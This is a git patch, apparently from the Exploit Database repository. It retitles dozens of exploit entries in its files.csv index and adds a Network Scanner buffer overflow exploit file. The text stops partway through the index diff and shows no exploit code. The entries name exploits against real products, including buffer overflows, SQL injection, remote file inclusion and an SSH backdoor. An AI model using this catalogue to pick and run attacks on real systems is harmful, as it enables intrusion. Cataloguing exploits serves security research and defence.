From f1ca42d762e55b3e7c6ec4e6b259ac5bc81e3898 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Wed, 26 Oct 2016 05:01:17 +0000 Subject: [PATCH] DB: 2016-10-26 1 new exploits WarFTP 1.65 (Windows 2000 SP4) - (USER) Remote Buffer Overflow WarFTP 1.65 (Windows 2000 SP4) - (USER) Remote Buffer Overflow (Python) WarFTP 1.65 - (USER) Remote Buffer Overflow SEH Overflow WarFTP 1.65 (Windows 2000 SP4) - (USER) Remote Buffer Overflow (Perl) Apple QuickTime 7.2/7.3 - RTSP Response Remote Overwrite (SEH) (PoC) Apple QuickTime 7.2/7.3 - RTSP Response Remote Overwrite (SEH) Apple QuickTime 7.2/7.3 - RTSP Response Universal Exploit (Internet Explorer 7 / Firefox / Opera) Apple QuickTime 7.2/7.3 (Internet Explorer 7 / Firefox / Opera) - RTSP Response Universal Exploit PHP-CON 1.3 - (include.php) Remote File Inclusion PHP-CON 1.3 - 'include.php' Remote File Inclusion RealPlayer 11 - Malformed AU File Denial of Service RealPlayer 11 - '.au' Denial of Service VideoLAN VLC Media Player 0.86 < 0.86d - ActiveX Remote Bad Pointer Initialization (PoC) VideoLAN VLC Media Player 0.86 < 0.86d - ActiveX Remote Bad Pointer Initialization Nullsoft Winamp 5.32 - MP4 tags Stack Overflow Nullsoft Winamp 5.32 - MP4 Tags Stack Overflow viart cms/shop/helpdesk 3.3.2 - Remote File Inclusion ViArt CMS/Shop/Helpdesk 3.3.2 - Remote File Inclusion Samba 3.0.27a - send_mailslot() Remote Buffer Overflow (PoC) Samba 3.0.27a - send_mailslot() Remote Buffer Overflow Horde Web-Mail 3.x - (go.php) Remote File Disclosure CuteNews 1.1.1 - (html.php) Remote Code Execution Horde Web-Mail 3.x - 'go.php' Remote File Disclosure CuteNews 1.1.1 - 'html.php' Remote Code Execution TUTOS 1.3 - (cmd.php) Remote Command Execution TUTOS 1.3 - 'cmd.php' Remote Command Execution PHP Webquest 2.6 - (id_actividad) SQL Injection Move Networks Quantum Streaming Player - Overwrite (SEH) Gateway Weblaunch - ActiveX Control Insecure Method Exploit PHP Webquest 2.6 - 'id_actividad' Parameter SQL Injection Move Networks Quantum Streaming Player - SEH Overflow Gateway Weblaunch - ActiveX Control Insecure Method Microsoft FoxServer - (vfp6r.dll 6.0.8862.0) ActiveX Command Execution Microsoft Rich Textbox Control 6.0 - (SP6) SaveFile() Insecure Method Microsoft FoxServer - 'vfp6r.dll 6.0.8862.0' ActiveX Command Execution Microsoft Rich Textbox Control 6.0-SP6 - 'SaveFile()' Insecure Method McAfee E-Business Server - Remote Unauthenticated Code Execution / Denial of Service (PoC) McAfee E-Business Server 8.5.2 - Remote Unauthenticated Code Execution / Denial of Service (PoC) Microsoft Visual InterDev 6.0 - (SP6) .sln File Local Buffer Overflow Microsoft Visual InterDev 6.0-SP6 - '.sln' Local Buffer Overflow StreamAudio ChainCast ProxyManager - ccpm_0237.dll Buffer Overflow StreamAudio ChainCast ProxyManager - 'ccpm_0237.dll' Buffer Overflow XnView 1.92.1 - Slideshow (FontName) Buffer Overflow XnView 1.92.1 - (FontName) Slideshow Buffer Overflow Phaos R4000 Version (file) - Remote File Disclosure Phaos R4000 Version - 'file' Remote File Disclosure ASPPortal Free Version (Topic_Id) - SQL Injection ASPPortal Free Version - 'Topic_Id' SQL Injection Alibaba Clone Tritanium Version (news_desc.html) - SQL Injection Alibaba Clone Tritanium Version - 'news_desc.html' SQL Injection XnView 1.97.4 - MBM File Remote Heap Buffer Overflow XnView 1.97.4 - '.MBM' File Remote Heap Buffer Overflow Fortigate OS Version 4.x < 5.0.7 - SSH Backdoor Fortigate OS 4.x < 5.0.7 - SSH Backdoor Network Scanner Version 4.0.0.0 - SEH Crash (PoC) Network Scanner 4.0.0.0 - SEH Crash (PoC) Ruby on Rails - Dynamic Render File Upload Remote Code Execution Ruby on Rails - Dynamic Render File Upload / Remote Code Execution Network Scanner 4.0.0 - SEH Local Buffer Overflow --- files.csv | 59 +++++++++++++------------- platforms/php/webapps/4670.txt | 5 ++- platforms/windows/local/40630.py | 71 ++++++++++++++++++++++++++++++++ 3 files changed, 105 insertions(+), 30 deletions(-) create mode 100755 platforms/windows/local/40630.py diff --git a/files.csv b/files.csv index 18c5a244c..5818885d3 100755 --- a/files.csv +++ b/files.csv @@ -3143,14 +3143,14 @@ id,file,description,date,author,platform,type,port 3471,platforms/php/webapps/3471.txt,"Activist Mobilization Platform (AMP) 3.2 - Remote File Inclusion",2007-03-13,the_day,php,webapps,0 3472,platforms/php/webapps/3472.txt,"CARE2X 1.1 - 'ROOT_PATH' Remote File Inclusion",2007-03-13,the_day,php,webapps,0 3473,platforms/php/webapps/3473.txt,"WebCreator 0.2.6-rc3 - (moddir) Remote File Inclusion",2007-03-13,the_day,php,webapps,0 -3474,platforms/windows/remote/3474.py,"WarFTP 1.65 (Windows 2000 SP4) - (USER) Remote Buffer Overflow",2007-03-14,"Winny Thomas",windows,remote,21 +3474,platforms/windows/remote/3474.py,"WarFTP 1.65 (Windows 2000 SP4) - (USER) Remote Buffer Overflow (Python)",2007-03-14,"Winny Thomas",windows,remote,21 3476,platforms/php/webapps/3476.pl,"Zomplog 3.7.6 (Windows x86) - Local File Inclusion",2007-03-14,Bl0od3r,php,webapps,0 3477,platforms/php/webapps/3477.htm,"WSN Guest 1.21 - (comments.php id) SQL Injection",2007-03-14,WiLdBoY,php,webapps,0 3478,platforms/php/webapps/3478.htm,"Dayfox Blog 4 - 'postpost.php' Remote Code Execution",2007-03-14,Dj7xpl,php,webapps,0 3479,platforms/linux/local/3479.php,"PHP 5.2.1 - session_regenerate_id() Double-Free Exploit",2007-03-14,"Stefan Esser",linux,local,0 3480,platforms/linux/local/3480.php,"PHP 5.2.0/5.2.1 - Rejected Session ID Double-Free Exploit",2007-03-14,"Stefan Esser",linux,local,0 3481,platforms/asp/webapps/3481.htm,"Orion-Blog 2.0 - (AdminBlogNewsEdit.asp) Remote Authentication Bypass",2007-03-15,WiLdBoY,asp,webapps,0 -3482,platforms/windows/remote/3482.pl,"WarFTP 1.65 - (USER) Remote Buffer Overflow SEH Overflow",2007-03-15,"Umesh Wanve",windows,remote,21 +3482,platforms/windows/remote/3482.pl,"WarFTP 1.65 (Windows 2000 SP4) - (USER) Remote Buffer Overflow (Perl)",2007-03-15,"Umesh Wanve",windows,remote,21 3483,platforms/php/webapps/3483.pl,"Woltlab Burning Board 2.x - (usergroups.php) SQL Injection",2007-03-15,x666,php,webapps,0 3484,platforms/php/webapps/3484.txt,"WebLog - 'index.php' Remote File Disclosure",2007-03-15,Dj7xpl,php,webapps,0 3485,platforms/php/webapps/3485.txt,"Company WebSite Builder PRO 1.9.8 - 'INCLUDE_PATH' Remote File Inclusion",2007-03-15,the_day,php,webapps,0 @@ -4299,7 +4299,7 @@ id,file,description,date,author,platform,type,port 4645,platforms/php/webapps/4645.txt,"Content Injector 1.52 - (index.php cat) SQL Injection",2007-11-22,S.W.A.T.,php,webapps,0 4646,platforms/php/webapps/4646.pl,"PHPKIT 1.6.4pl1 - article.php SQL Injection",2007-11-22,Shadowleet,php,webapps,0 4647,platforms/cgi/webapps/4647.txt,"KB-Bestellsystem - 'kb_whois.cgi' Command Execution",2007-11-22,"Zero X",cgi,webapps,0 -4648,platforms/multiple/dos/4648.py,"Apple QuickTime 7.2/7.3 - RTSP Response Remote Overwrite (SEH) (PoC)",2007-11-23,h07,multiple,dos,0 +4648,platforms/multiple/dos/4648.py,"Apple QuickTime 7.2/7.3 - RTSP Response Remote Overwrite (SEH)",2007-11-23,h07,multiple,dos,0 4649,platforms/php/webapps/4649.txt,"Irola My-Time 3.5 - SQL Injection",2007-11-23,"Aria-Security Team",php,webapps,0 4650,platforms/php/webapps/4650.txt,"Mp3 ToolBox 1.0 Beta 5 - (skin_file) Remote File Inclusion",2007-11-23,Crackers_Child,php,webapps,0 4651,platforms/windows/remote/4651.cpp,"Apple QuickTime 7.2/7.3 (Windows Vista / Windows XP) - RSTP Response Code Execution",2007-11-24,InTeL,windows,remote,0 @@ -4308,7 +4308,7 @@ id,file,description,date,author,platform,type,port 4654,platforms/php/webapps/4654.txt,"PBLang 4.99.17.q - Remote File Rewriting / Command Execution",2007-11-24,KiNgOfThEwOrLd,php,webapps,0 4655,platforms/php/webapps/4655.txt,"project alumni 1.0.9 - Cross-Site Scripting / SQL Injection",2007-11-24,tomplixsee,php,webapps,0 4656,platforms/php/webapps/4656.txt,"RunCMS 1.6 - Local File Inclusion",2007-11-24,BugReport.IR,php,webapps,0 -4657,platforms/windows/remote/4657.py,"Apple QuickTime 7.2/7.3 - RTSP Response Universal Exploit (Internet Explorer 7 / Firefox / Opera)",2007-11-26,muts,windows,remote,0 +4657,platforms/windows/remote/4657.py,"Apple QuickTime 7.2/7.3 (Internet Explorer 7 / Firefox / Opera) - RTSP Response Universal Exploit",2007-11-26,muts,windows,remote,0 4658,platforms/php/webapps/4658.php,"RunCMS 1.6 - disclaimer.php Remote File Overwrite",2007-11-25,BugReport.IR,php,webapps,0 4659,platforms/php/webapps/4659.txt,"IAPR COMMENCE 1.3 - Multiple Remote File Inclusion",2007-11-25,ShAy6oOoN,php,webapps,0 4660,platforms/php/webapps/4660.pl,"Softbiz Freelancers Script 1 - SQL Injection",2007-11-25,"Khashayar Fereidani",php,webapps,0 @@ -4321,7 +4321,7 @@ id,file,description,date,author,platform,type,port 4667,platforms/php/webapps/4667.txt,"PHP-Nuke NSN Script Depository 1.0.0 - Remote Source Disclosure",2007-11-27,KiNgOfThEwOrLd,php,webapps,0 4668,platforms/php/webapps/4668.txt,"wpQuiz 2.7 - Multiple SQL Injections",2007-11-27,Kacper,php,webapps,0 4669,platforms/php/webapps/4669.txt,"project alumni 1.0.9 - (index.php act) Local File Inclusion",2007-11-27,tomplixsee,php,webapps,0 -4670,platforms/php/webapps/4670.txt,"PHP-CON 1.3 - (include.php) Remote File Inclusion",2007-11-28,GoLd_M,php,webapps,0 +4670,platforms/php/webapps/4670.txt,"PHP-CON 1.3 - 'include.php' Remote File Inclusion",2007-11-28,GoLd_M,php,webapps,0 4671,platforms/php/webapps/4671.txt,"EHCP 0.22.8 - Multiple Remote File Inclusion",2007-11-28,MhZ91,php,webapps,0 4672,platforms/php/webapps/4672.txt,"Charrays CMS 0.9.3 - Multiple Remote File Inclusion",2007-11-28,MhZ91,php,webapps,0 4673,platforms/multiple/remote/4673.rb,"Apple QuickTime 7.2/7.3 (OSX/Windows) - RSTP Response Universal Exploit",2007-11-29,"Subreption LLC.",multiple,remote,0 @@ -4334,12 +4334,12 @@ id,file,description,date,author,platform,type,port 4680,platforms/php/webapps/4680.txt,"LearnLoop 2.0beta7 - (sFilePath) Remote File Disclosure",2007-11-29,GoLd_M,php,webapps,0 4681,platforms/php/webapps/4681.txt,"ftp Admin 0.1.0 - (Local File Inclusion / Cross-Site Scripting / Authentication Bypass) Multiple Vulnerabilities",2007-11-29,Omni,php,webapps,0 4682,platforms/windows/dos/4682.c,"Microsoft Windows Media Player - AIFF Divide By Zero Exception Denial of Service (PoC)",2007-11-29,"Gil-Dong / Woo-Chi",windows,dos,0 -4683,platforms/windows/dos/4683.py,"RealPlayer 11 - Malformed AU File Denial of Service",2007-12-01,NtWaK0,windows,dos,0 +4683,platforms/windows/dos/4683.py,"RealPlayer 11 - '.au' Denial of Service",2007-12-01,NtWaK0,windows,dos,0 4684,platforms/php/webapps/4684.txt,"tellmatic 1.0.7 - Multiple Remote File Inclusion",2007-12-01,ShAy6oOoN,php,webapps,0 4685,platforms/php/webapps/4685.txt,"Rayzz Script 2.0 - Remote File Inclusion / Local File Inclusion",2007-12-01,Crackers_Child,php,webapps,0 4686,platforms/php/webapps/4686.txt,"phpBB Garage 1.2.0 Beta3 - SQL Injection",2007-12-03,maku234,php,webapps,0 4687,platforms/asp/webapps/4687.htm,"Snitz Forums 2000 - Active.asp SQL Injection",2007-12-03,BugReport.IR,asp,webapps,0 -4688,platforms/windows/dos/4688.html,"VideoLAN VLC Media Player 0.86 < 0.86d - ActiveX Remote Bad Pointer Initialization (PoC)",2007-12-04,"Ricardo Narvaja",windows,dos,0 +4688,platforms/windows/dos/4688.html,"VideoLAN VLC Media Player 0.86 < 0.86d - ActiveX Remote Bad Pointer Initialization",2007-12-04,"Ricardo Narvaja",windows,dos,0 4689,platforms/osx/dos/4689.c,"Apple Mac OSX xnu 1228.0 - mach-o Local Kernel Denial of Service (PoC)",2007-12-04,mu-b,osx,dos,0 4690,platforms/osx/dos/4690.c,"Apple Mac OSX 10.5.0 (Leopard) - vpnd Remote Denial of Service (PoC)",2007-12-04,mu-b,osx,dos,0 4691,platforms/php/webapps/4691.txt,"Joomla! / Mambo Component rsgallery 2.0b5 - 'catid' SQL Injection",2007-12-05,K-159,php,webapps,0 @@ -4354,7 +4354,7 @@ id,file,description,date,author,platform,type,port 4700,platforms/windows/remote/4700.txt,"simple httpd 1.38 - Multiple Vulnerabilities",2007-12-07,"Luigi Auriemma",windows,remote,0 4701,platforms/windows/local/4701.pl,"Media Player Classic 6.4.9 MP4 - File Stack Overflow",2007-12-08,"SYS 49152",windows,local,0 4702,platforms/windows/local/4702.pl,"Microsoft Windows Media Player 6.4 MP4 - File Stack Overflow (PoC)",2007-12-08,"SYS 49152",windows,local,0 -4703,platforms/windows/local/4703.pl,"Nullsoft Winamp 5.32 - MP4 tags Stack Overflow",2007-12-08,"SYS 49152",windows,local,0 +4703,platforms/windows/local/4703.pl,"Nullsoft Winamp 5.32 - MP4 Tags Stack Overflow",2007-12-08,"SYS 49152",windows,local,0 4704,platforms/php/webapps/4704.txt,"PolDoc CMS 0.96 - (download_file.php) File Disclosure",2007-12-08,GoLd_M,php,webapps,0 4705,platforms/php/webapps/4705.txt,"Flat PHP Board 1.2 - Multiple Vulnerabilities",2007-12-09,KiNgOfThEwOrLd,php,webapps,0 4706,platforms/php/webapps/4706.txt,"Content Injector 1.53 - 'index.php' SQL Injection",2007-12-09,S.W.A.T.,php,webapps,0 @@ -4373,7 +4373,7 @@ id,file,description,date,author,platform,type,port 4719,platforms/php/webapps/4719.txt,"Mcms Easy Web Make - 'index.php template' Local File Inclusion",2007-12-11,MhZ91,php,webapps,0 4720,platforms/windows/remote/4720.html,"HP Compaq Notebooks - ActiveX Remote Code Execution",2007-12-11,porkythepig,windows,remote,0 4721,platforms/php/webapps/4721.txt,"WordPress 2.3.1 - Charset SQL Injection",2007-12-11,"Abel Cheung",php,webapps,0 -4722,platforms/php/webapps/4722.txt,"viart cms/shop/helpdesk 3.3.2 - Remote File Inclusion",2007-12-11,RoMaNcYxHaCkEr,php,webapps,0 +4722,platforms/php/webapps/4722.txt,"ViArt CMS/Shop/Helpdesk 3.3.2 - Remote File Inclusion",2007-12-11,RoMaNcYxHaCkEr,php,webapps,0 4723,platforms/osx/dos/4723.c,"Apple Mac OSX xnu 1228.0 - super_blob Local kernel Denial of Service (PoC)",2007-12-12,mu-b,osx,dos,0 4724,platforms/windows/remote/4724.py,"HP OpenView Network Node Manager 07.50 - CGI Remote Buffer Overflow",2007-12-12,muts,windows,remote,80 4725,platforms/php/webapps/4725.txt,"Fastpublish CMS 1.9999 - config[fsBase] Remote File Inclusion",2007-12-12,RoMaNcYxHaCkEr,php,webapps,0 @@ -4383,7 +4383,7 @@ id,file,description,date,author,platform,type,port 4729,platforms/php/webapps/4729.txt,"xml2owl 0.1.1 - (filedownload.php) Remote File Disclosure",2007-12-13,GoLd_M,php,webapps,0 4730,platforms/asp/webapps/4730.txt,"hosting controller 6.1 hot fix 3.3 - Multiple Vulnerabilities",2007-12-13,BugReport.IR,asp,webapps,0 4731,platforms/php/webapps/4731.php,"Adult Script 1.6 - Unauthorized Administrative Access",2007-12-13,Liz0ziM,php,webapps,0 -4732,platforms/linux/dos/4732.c,"Samba 3.0.27a - send_mailslot() Remote Buffer Overflow (PoC)",2007-12-14,x86,linux,dos,0 +4732,platforms/linux/dos/4732.c,"Samba 3.0.27a - send_mailslot() Remote Buffer Overflow",2007-12-14,x86,linux,dos,0 4733,platforms/php/webapps/4733.txt,"123tkShop 0.9.1 - Remote Authentication Bypass",2007-12-14,"Michael Brooks",php,webapps,0 4734,platforms/php/webapps/4734.txt,"Anon Proxy Server 0.1000 - Remote Command Execution",2007-12-14,"Michael Brooks",php,webapps,0 4735,platforms/php/webapps/4735.txt,"Oreon 1.4 / Centreon 1.4.1 - Multiple Remote File Inclusion Vulnerabilities",2007-12-14,"Michael Brooks",php,webapps,0 @@ -4499,8 +4499,8 @@ id,file,description,date,author,platform,type,port 4847,platforms/php/webapps/4847.txt,"XOOPS mod_gallery Zend_Hash_key + Extract - Remote File Inclusion",2008-01-06,"Eugene Minaev",php,webapps,0 4848,platforms/asp/webapps/4848.txt,"PortalApp 4.0 - (SQL Injection / Cross-Site Scripting / Authentication Bypass) Multiple Vulnerabilities",2008-01-06,r3dm0v3,asp,webapps,0 4849,platforms/php/webapps/4849.txt,"LoudBlog 0.6.1 - (parsedpage) Remote Code Execution",2008-01-06,"Eugene Minaev",php,webapps,0 -4850,platforms/php/webapps/4850.txt,"Horde Web-Mail 3.x - (go.php) Remote File Disclosure",2008-01-06,"Eugene Minaev",php,webapps,0 -4851,platforms/php/webapps/4851.txt,"CuteNews 1.1.1 - (html.php) Remote Code Execution",2008-01-06,"Eugene Minaev",php,webapps,0 +4850,platforms/php/webapps/4850.txt,"Horde Web-Mail 3.x - 'go.php' Remote File Disclosure",2008-01-06,"Eugene Minaev",php,webapps,0 +4851,platforms/php/webapps/4851.txt,"CuteNews 1.1.1 - 'html.php' Remote Code Execution",2008-01-06,"Eugene Minaev",php,webapps,0 4852,platforms/php/webapps/4852.txt,"netrisk 1.9.7 - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities",2008-01-06,"Virangar Security",php,webapps,0 4853,platforms/php/webapps/4853.php,"DCP-Portal 6.11 - SQL Injection",2008-01-06,x0kster,php,webapps,0 4854,platforms/php/webapps/4854.txt,"SineCMS 2.3.5 - Local File Inclusion / Remote Code Execution",2008-01-06,KiNgOfThEwOrLd,php,webapps,0 @@ -4510,23 +4510,23 @@ id,file,description,date,author,platform,type,port 4858,platforms/php/webapps/4858.pl,"FlexBB 0.6.3 - Cookies SQL Injection",2008-01-07,"Eugene Minaev",php,webapps,0 4859,platforms/php/webapps/4859.txt,"EkinBoard 1.1.0 - Arbitrary File Upload / Authentication Bypass",2008-01-07,"Eugene Minaev",php,webapps,0 4860,platforms/php/webapps/4860.pl,"Eggblog 3.1.0 - Cookies SQL Injection",2008-01-07,"Eugene Minaev",php,webapps,0 -4861,platforms/php/webapps/4861.txt,"TUTOS 1.3 - (cmd.php) Remote Command Execution",2008-01-07,Houssamix,php,webapps,0 +4861,platforms/php/webapps/4861.txt,"TUTOS 1.3 - 'cmd.php' Remote Command Execution",2008-01-07,Houssamix,php,webapps,0 4862,platforms/linux/remote/4862.py,"ClamAV 0.91.2 - libclamav MEW PE Buffer Overflow",2008-01-07,"Thomas Pollet",linux,remote,0 4863,platforms/php/webapps/4863.pl,"SmallNuke 2.0.4 - Pass Recovery SQL Injection",2008-01-08,"Eugene Minaev",php,webapps,0 4864,platforms/php/webapps/4864.txt,"ZeroCMS 1.0 Alpha - Arbitrary File Upload / SQL Injection",2008-01-08,KiNgOfThEwOrLd,php,webapps,0 4865,platforms/php/webapps/4865.txt,"evilboard 0.1a - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2008-01-08,seaofglass,php,webapps,0 4866,platforms/windows/remote/4866.py,"Microsoft DirectX SAMI File Parsing - Remote Stack Overflow",2008-01-08,ryujin,windows,remote,0 -4867,platforms/php/webapps/4867.pl,"PHP Webquest 2.6 - (id_actividad) SQL Injection",2008-01-08,ka0x,php,webapps,0 -4868,platforms/windows/remote/4868.html,"Move Networks Quantum Streaming Player - Overwrite (SEH)",2008-01-08,Elazar,windows,remote,0 -4869,platforms/windows/remote/4869.html,"Gateway Weblaunch - ActiveX Control Insecure Method Exploit",2008-01-08,Elazar,windows,remote,0 +4867,platforms/php/webapps/4867.pl,"PHP Webquest 2.6 - 'id_actividad' Parameter SQL Injection",2008-01-08,ka0x,php,webapps,0 +4868,platforms/windows/remote/4868.html,"Move Networks Quantum Streaming Player - SEH Overflow",2008-01-08,Elazar,windows,remote,0 +4869,platforms/windows/remote/4869.html,"Gateway Weblaunch - ActiveX Control Insecure Method",2008-01-08,Elazar,windows,remote,0 4870,platforms/php/webapps/4870.txt,"osData 2.08 Modules Php121 - Local File Inclusion",2008-01-09,"Cold Zero",php,webapps,0 4871,platforms/php/webapps/4871.php,"UploadImage/UploadScript 1.0 - Remote Change Admin Password",2008-01-09,Dj7xpl,php,webapps,0 4872,platforms/php/webapps/4872.txt,"PHP Webquest 2.6 - Get Database Credentials",2008-01-09,MhZ91,php,webapps,0 -4873,platforms/windows/remote/4873.html,"Microsoft FoxServer - (vfp6r.dll 6.0.8862.0) ActiveX Command Execution",2008-01-09,shinnai,windows,remote,0 -4874,platforms/windows/remote/4874.html,"Microsoft Rich Textbox Control 6.0 - (SP6) SaveFile() Insecure Method",2008-01-09,shinnai,windows,remote,0 +4873,platforms/windows/remote/4873.html,"Microsoft FoxServer - 'vfp6r.dll 6.0.8862.0' ActiveX Command Execution",2008-01-09,shinnai,windows,remote,0 +4874,platforms/windows/remote/4874.html,"Microsoft Rich Textbox Control 6.0-SP6 - 'SaveFile()' Insecure Method",2008-01-09,shinnai,windows,remote,0 4876,platforms/php/webapps/4876.txt,"Tuned Studios Templates - Local File Inclusion",2008-01-09,DSecRG,php,webapps,0 4877,platforms/multiple/remote/4877.txt,"SAP MaxDB 7.6.03.07 - Unauthenticated Remote Command Execution",2008-01-09,"Luigi Auriemma",multiple,remote,7210 -4878,platforms/multiple/dos/4878.pl,"McAfee E-Business Server - Remote Unauthenticated Code Execution / Denial of Service (PoC)",2008-01-09,"Leon Juranic",multiple,dos,0 +4878,platforms/multiple/dos/4878.pl,"McAfee E-Business Server 8.5.2 - Remote Unauthenticated Code Execution / Denial of Service (PoC)",2008-01-09,"Leon Juranic",multiple,dos,0 4879,platforms/php/webapps/4879.php,"Docebo 3.5.0.3 - (lib.regset.php) Command Execution",2008-01-09,EgiX,php,webapps,0 4880,platforms/php/webapps/4880.php,"DomPHP 0.81 - Remote Add Administrator Exploit",2008-01-10,j0j0,php,webapps,0 4881,platforms/solaris/dos/4881.c,"SunOS 5.10 - Remote ICMP Kernel Crash",2008-01-10,kingcope,solaris,dos,0 @@ -4540,9 +4540,9 @@ id,file,description,date,author,platform,type,port 4889,platforms/php/webapps/4889.txt,"vcart 3.3.2 - Multiple Remote File Inclusion",2008-01-11,k1n9k0ng,php,webapps,0 4890,platforms/php/webapps/4890.txt,"AJchat 0.10 - unset() bug SQL Injection",2008-01-11,"Eugene Minaev",php,webapps,0 4891,platforms/php/webapps/4891.php,"Docebo 3.5.0.3 - (lib.regset.php/non-blind) SQL Injection",2008-01-11,rgod,php,webapps,0 -4892,platforms/windows/local/4892.py,"Microsoft Visual InterDev 6.0 - (SP6) .sln File Local Buffer Overflow",2008-01-11,shinnai,windows,local,0 +4892,platforms/windows/local/4892.py,"Microsoft Visual InterDev 6.0-SP6 - '.sln' Local Buffer Overflow",2008-01-11,shinnai,windows,local,0 4893,platforms/linux/dos/4893.c,"Linux Kernel 2.6.21.1 - IPv6 Jumbo Bug Remote Denial of Service",2008-01-11,"Clemens Kurtenbach",linux,dos,0 -4894,platforms/windows/remote/4894.html,"StreamAudio ChainCast ProxyManager - ccpm_0237.dll Buffer Overflow",2008-01-11,Elazar,windows,remote,0 +4894,platforms/windows/remote/4894.html,"StreamAudio ChainCast ProxyManager - 'ccpm_0237.dll' Buffer Overflow",2008-01-11,Elazar,windows,remote,0 4895,platforms/php/webapps/4895.txt,"ImageAlbum 2.0.0b2 - 'id' SQL Injection",2008-01-11,"Raw Security",php,webapps,0 4896,platforms/php/webapps/4896.pl,"0DayDB 2.3 - 'delete id' Remote Authentication Bypass",2008-01-11,Pr0metheuS,php,webapps,0 4897,platforms/php/webapps/4897.pl,"photokron 1.7 - (update script) Remote Database Disclosure",2008-01-11,Pr0metheuS,php,webapps,0 @@ -4986,7 +4986,7 @@ id,file,description,date,author,platform,type,port 5343,platforms/windows/dos/5343.py,"Mcafee EPO 4.0 - FrameworkService.exe Remote Denial of Service",2008-04-02,muts,windows,dos,0 5344,platforms/windows/dos/5344.py,"Novel eDirectory HTTP - Denial of Service",2008-04-02,muts,windows,dos,0 5345,platforms/php/webapps/5345.txt,"Joomla! Component OnlineFlashQuiz 1.0.2 - Remote File Inclusion",2008-04-02,NoGe,php,webapps,0 -5346,platforms/windows/local/5346.pl,"XnView 1.92.1 - Slideshow (FontName) Buffer Overflow",2008-04-02,haluznik,windows,local,0 +5346,platforms/windows/local/5346.pl,"XnView 1.92.1 - (FontName) Slideshow Buffer Overflow",2008-04-02,haluznik,windows,local,0 5347,platforms/php/webapps/5347.txt,"DaZPHP 0.1 - (prefixdir) Local File Inclusion",2008-04-02,w0cker,php,webapps,0 5348,platforms/php/webapps/5348.txt,"PhpBlock a8.4 - (PATH_TO_CODE) Remote File Inclusion",2008-04-02,w0cker,php,webapps,0 5349,platforms/windows/dos/5349.py,"Microsoft Visual InterDev 6.0 - (SP6) SLN File Local Buffer Overflow (PoC)",2008-04-03,shinnai,windows,dos,0 @@ -5059,7 +5059,7 @@ id,file,description,date,author,platform,type,port 5417,platforms/php/webapps/5417.htm,"phpBB Addon Fishing Cat Portal - Remote File Inclusion",2008-04-09,bd0rk,php,webapps,0 5418,platforms/php/webapps/5418.pl,"KnowledgeQuest 2.5 - Arbitrary Add Admin",2008-04-09,t0pP8uZz,php,webapps,0 5419,platforms/php/webapps/5419.txt,"Free Photo Gallery Site Script - (path) File Disclosure",2008-04-09,JIKO,php,webapps,0 -5420,platforms/php/webapps/5420.txt,"Phaos R4000 Version (file) - Remote File Disclosure",2008-04-09,HaCkeR_EgY,php,webapps,0 +5420,platforms/php/webapps/5420.txt,"Phaos R4000 Version - 'file' Remote File Disclosure",2008-04-09,HaCkeR_EgY,php,webapps,0 5421,platforms/php/webapps/5421.txt,"KnowledgeQuest 2.6 - SQL Injection",2008-04-09,"Virangar Security",php,webapps,0 5422,platforms/php/webapps/5422.pl,"LiveCart 1.1.1 - (category id) Blind SQL Injection",2008-04-10,irvian,php,webapps,0 5423,platforms/php/webapps/5423.txt,"Ksemail - 'index.php language' Local File Inclusion",2008-04-10,dun,php,webapps,0 @@ -5404,7 +5404,7 @@ id,file,description,date,author,platform,type,port 5772,platforms/php/webapps/5772.txt,"DCFM Blog 0.9.4 - (comments) SQL Injection",2008-06-10,Unohope,php,webapps,0 5773,platforms/php/webapps/5773.txt,"yblog 0.2.2.2 - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities",2008-06-10,Unohope,php,webapps,0 5774,platforms/php/webapps/5774.txt,"Insanely Simple Blog 0.5 - (index) SQL Injection",2008-06-10,Unohope,php,webapps,0 -5775,platforms/php/webapps/5775.txt,"ASPPortal Free Version (Topic_Id) - SQL Injection",2008-06-10,JosS,php,webapps,0 +5775,platforms/php/webapps/5775.txt,"ASPPortal Free Version - 'Topic_Id' SQL Injection",2008-06-10,JosS,php,webapps,0 5776,platforms/php/webapps/5776.txt,"Experts 1.0.0 - (answer.php) SQL Injection",2008-06-10,"CWH Underground",php,webapps,0 5777,platforms/windows/remote/5777.html,"Black Ice Software Annotation Plugin - 'BiAnno.ocx' Remote Buffer Overflow",2008-06-10,shinnai,windows,remote,0 5778,platforms/windows/remote/5778.html,"Black Ice Software Annotation Plugin - (BiAnno.ocx) Buffer Overflow (2)",2008-06-10,shinnai,windows,remote,0 @@ -24760,7 +24760,7 @@ id,file,description,date,author,platform,type,port 27602,platforms/php/webapps/27602.txt,"DotNetNuke DNNArticle Module 10.0 - SQL Injection",2013-08-15,"Sajjad Pourali",php,webapps,0 27603,platforms/php/webapps/27603.txt,"w-CMS 2.0.1 - Remote Code Execution",2013-08-15,ICheer_No0M,php,webapps,0 27806,platforms/windows/remote/27806.txt,"BankTown ActiveX Control 1.4.2.51817/1.5.2.50209 - Remote Buffer Overflow",2006-05-03,"Gyu Tae",windows,remote,0 -27605,platforms/php/webapps/27605.txt,"Alibaba Clone Tritanium Version (news_desc.html) - SQL Injection",2013-08-15,IRAQ_JAGUAR,php,webapps,0 +27605,platforms/php/webapps/27605.txt,"Alibaba Clone Tritanium Version - 'news_desc.html' SQL Injection",2013-08-15,IRAQ_JAGUAR,php,webapps,0 27606,platforms/windows/remote/27606.rb,"Intrasrv 1.0 - Buffer Overflow (Metasploit)",2013-08-15,Metasploit,windows,remote,80 27607,platforms/windows/remote/27607.rb,"MiniWeb (Build 300) - Arbitrary File Upload (Metasploit)",2013-08-15,Metasploit,windows,remote,8000 27608,platforms/windows/remote/27608.rb,"Ultra Mini HTTPD - Stack Buffer Overflow (Metasploit)",2013-08-15,Metasploit,windows,remote,80 @@ -30596,7 +30596,7 @@ id,file,description,date,author,platform,type,port 33855,platforms/linux/remote/33855.txt,"MIT Kerberos 5 - 'src/kdc/do_tgs_req.c' Ticket Renewal Double-Free Memory Corruption",2010-04-20,"Joel Johnson",linux,remote,0 33856,platforms/php/webapps/33856.txt,"Viennabux Beta! - 'cat' Parameter SQL Injection",2010-04-09,"Easy Laster",php,webapps,0 33858,platforms/php/webapps/33858.txt,"DBSite wb CMS - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2010-04-21,The_Exploited,php,webapps,0 -34143,platforms/windows/remote/34143.txt,"XnView 1.97.4 - MBM File Remote Heap Buffer Overflow",2010-06-14,"Mauro Olea",windows,remote,0 